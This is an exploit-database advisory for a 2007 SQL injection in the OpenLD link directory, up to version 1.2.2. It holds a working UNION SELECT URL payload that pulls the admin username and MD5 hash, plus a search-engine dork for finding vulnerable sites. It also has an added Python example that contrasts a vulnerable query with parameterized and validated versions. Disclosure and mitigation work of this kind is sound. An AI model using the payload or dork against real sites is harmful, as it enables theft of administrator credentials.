Vendor: OpenLD
By: Cody "CypherXero" Rester
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: OpenLD
Affected Version From: OpenLD <= 1.2.2
Affected Version To: OpenLD <= 1.2.2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

OpenLD <= 1.2.2 SQL Injection Exploit

This exploit allows an attacker to execute SQL queries and retrieve sensitive information such as the admin username and MD5 hash. OpenLD version 1.2.2 and earlier are affected. By manipulating the 'id' parameter in the URL, an attacker can inject SQL code and retrieve data from the 'settings' table.

Mitigation:

To mitigate this vulnerability, users should update to a patched version of OpenLD or use alternative software. Additionally, input validation and parameterized queries should be implemented to prevent SQL injection attacks.
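The mitigation described above, shown as an added example in Python with sqlite3 (it is not OpenLD's code, which is not shown on this page). The `links` table, its column names, the `settings` row and the function names are constructed assumptions; the `id` value is the one from the EXPLOITS line on this page.

```python
import sqlite3

# Constructed stand-in schema: a 14-column listing table (the column count the
# page's UNION payload assumes) and a settings table holding a placeholder hash.
def make_db():
    db = sqlite3.connect(":memory:")
    cols = ", ".join(f"c{i} TEXT" for i in range(2, 15))
    db.execute(f"CREATE TABLE links (id INTEGER PRIMARY KEY, {cols})")
    db.execute("INSERT INTO links (id, c6) VALUES (1, 'Example listing')")
    db.execute("CREATE TABLE settings (name TEXT, value TEXT)")
    db.execute("INSERT INTO settings VALUES ('admin_pass', 'PLACEHOLDER_MD5')")
    return db

# The 'id' value from the page's EXPLOITS line.
PAYLOAD = ("999/**/UNION/**/SELECT/**/ALL/**/null,null,null,null,null,value,"
           "null,null,null,null,null,null,null,null/**/FROM/**/settings--")

def lookup_vulnerable(db, raw_id):
    # Flawed pattern: the request value becomes part of the SQL text, so the
    # comment-padded UNION SELECT is parsed and executed as a second query.
    return db.execute("SELECT * FROM links WHERE id = " + raw_id).fetchall()

def lookup_bound_only(db, raw_id):
    # Parameterized query without validation: the value is compared as data,
    # so the UNION never runs and no row matches.
    return db.execute("SELECT * FROM links WHERE id = ?", (raw_id,)).fetchall()

def lookup_hardened(db, raw_id):
    # Input validation: 'id' must be a short run of ASCII digits.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 10):
        raise ValueError("id must be a positive integer")
    # Parameterized query: the validated value is bound, never concatenated.
    return db.execute("SELECT * FROM links WHERE id = ?", (int(raw_id),)).fetchall()
```

Rejecting a non-numeric `id` before the query also gives the application a clean point at which to log the request for review.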

Exploit-DB raw data:

--==+================================================================================+==--
--==+                       OpenLD  <= 1.2.2 SQL Injection Exploit                   +==--
--==+================================================================================+==--
DISCOVERED BY: Cody "CypherXero" Rester
PAYLOAD: Admin username and MD5 Hash
WEBSITE: http://www.cypherxero.net

Shoutouts to my friends darkfusion and magikgrl for being fucking awesome. w0rd.
--==+================================================================================+==--

NOTES:

The table names may have an extension that is unique to the website. The standard table name
is "settings", but may be "openld_settngs" or possibly the name of the site.

DORK:

"Powered by OpenLD"

EXPLOITS:

http://www.website.com/index.php?id=999/**/UNION/**/SELECT/**/ALL/**/null,null,null,null,null,value,null,null,null,null,null,null,null,null/**/FROM/**/settings--

# milw0rm.com [2007-07-10]